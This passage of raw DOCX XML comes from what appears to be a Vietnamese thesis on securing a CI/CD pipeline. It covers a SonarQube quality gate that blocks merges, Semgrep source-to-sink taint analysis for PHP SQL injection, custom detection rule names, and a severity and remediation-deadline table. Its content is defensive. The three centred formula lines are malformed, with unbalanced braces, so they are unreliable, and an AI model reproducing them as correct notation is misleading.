          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi hoàn tất phân tích, kịch bản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>python3 ci/sonarqube.py check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đọc tệp trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reports/sonarqube/status.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nếu Quality Gate trả về trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ERROR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, kịch bản lập tức phát tín hiệu báo động ra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và trả về mã thoát lỗi khác 0 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>sys.exit(1)</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Khi tiến trình trả về mã lỗi 1, GitHub Actions lập tức đánh dấu Job kiểm tra an ninh và chất lượng mã nguồn ở Stage 2 chuyển sang trạng thái Thất bại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hệ quả của việc chặn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Toàn bộ các công đoạn tiếp theo bao gồm Stage 3 (Kiểm thử hạ tầng) và Stage 4 (Triển khai Production) bị hủy bỏ. Đồng thời, cơ chế bảo vệ nhánh trên GitHub phát hiện bài kiểm tra bắt buộc bị thất bại, lập tức vô hiệu hóa nút bấm hợp nhất Merge Pull Request, ngăn chặn tuyệt đối mã nguồn có lỗi lọt vào nhánh tích hợp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.2. Dò luồng dữ liệu độc hại bằng Semgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khác với các công cụ quét dựa trên biểu thức chính quy đơn thuần vốn tạo ra tỷ lệ cảnh báo giả rất cao, Semgrep Engine sử dụng phương pháp phân tích ngữ nghĩa và truy vết luồng dữ liệu ô nhiễm (Semantic Taint Analysis):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mô hình hóa bài toán truy vết dữ liệu (Taint Flow Formalization):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Một biến dữ liệu $x$ được xác định là bị ô nhiễm (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tainted Variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) khi nó bắt nguồn từ một điểm tiếp nhận dữ liệu không tin cậy của người dùng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Source} ∈ {Inputs}_{untrusted}}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong môi trường ứng dụng PHP, các điểm đón dữ liệu này bao gồm các biến toàn cục: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_SERVER['QUERY_STRING']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Biến này lan truyền qua đồ thị dòng điều khiển (Control Flow Graph - CFG) mà không đi qua bất kỳ cơ chế lọc hoặc làm sạch hợp lệ nào (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sanitizer} ∈ {Functions}_{safe}}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Các cơ chế phòng vệ hợp lệ gồm: hàm xử lý chuỗi an toàn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_real_escape_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, ép kiểu số học </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>intval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, hoặc sử dụng kỹ thuật tham số hóa câu truy vấn Prepared Statements (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$pdo-&gt;prepare()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nếu luồng dữ liệu ô nhiễm không được làm sạch và chạm tới các điểm tiếp nhận thực thi nhạy cảm (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sink} ∈ {Functions}_{critical}}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Bao gồm các hàm thực thi truy vấn cơ sở dữ liệu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_real_query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_multi_query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PDO::query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi đường truyền từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> $\to$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> thỏa mãn điều kiện không có </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, Semgrep Engine sẽ lập tức xác lập một vi phạm an ninh nghiêm trọng tương ứng với mã định danh lỗ hổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>CWE-89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQL Injection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tập luật nhận diện tùy biến địa phương (`ci/semgrep-local-rules.yml`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhóm nghiên cứu đã phát triển bộ quy tắc chuyên biệt bổ sung vào hệ thống kiểm tra, tập trung phát hiện các mẫu vi phạm đặc thù trong kiến trúc ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php-hardcoded-db-password-fallback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>: Nhận diện các chuỗi mật khẩu cơ sở dữ liệu hardcoded trong mã nguồn PHP thay vì đọc qua biến môi trường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php-sqli-unquoted-concatenation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>: Nhận diện các câu truy vấn cơ sở dữ liệu nối chuỗi trực tiếp mà không qua prepared statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php-mysqli-multi-query-misuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Phát hiện việc sử dụng hàm thực thi đa truy vấn nguy hiểm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_multi_query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép kẻ tấn công thực thi nhiều câu lệnh SQL liên tiếp trong một payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bang"/>
        <w:spacing w:before="240" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.4: Phân cấp mức độ nghiêm trọng và thời hạn khắc phục lỗ hổng (SLA)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
        <w:gridCol w:w="2367"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Mức độ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>severity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>)</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Định nghĩa kỹ thuật</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Ảnh hưởng tới CI/CD Gate</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Thời hạn khắc phục (SLA)</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ERROR (Critical/High)</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Các lỗ hổng cho phép thực thi mã từ xa, tiêm mã SQL, lộ lọt thông tin bí mật (Hardcoded Credentials), hoặc vượt qua cơ chế xác thực.</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ngay lập tức</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Break-the-Build). Không cho phép merge.</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Tối đa 04 giờ làm việc kể từ khi phát hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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WARNING (Medium)</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Các điểm vi phạm an toàn cấu hình, thuật toán mã hóa lỗi thời, thiếu cờ bảo mật cookie, hoặc vi phạm kiến trúc mã nguồn.</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Cảnh báo chi tiết trên Step Summary và Báo cáo kiểm định.</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Tối đa 24 giờ làm việc</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INFO (Low/Audit)</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Các gợi ý tối ưu mã nguồn, chuẩn phong cách lập trình an toàn, hoặc phát hiện đoạn mã rác không sử dụng.</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Ghi nhận trong danh mục cải tiến kỹ thuật.</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Đưa vào backlog xử lý theo sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
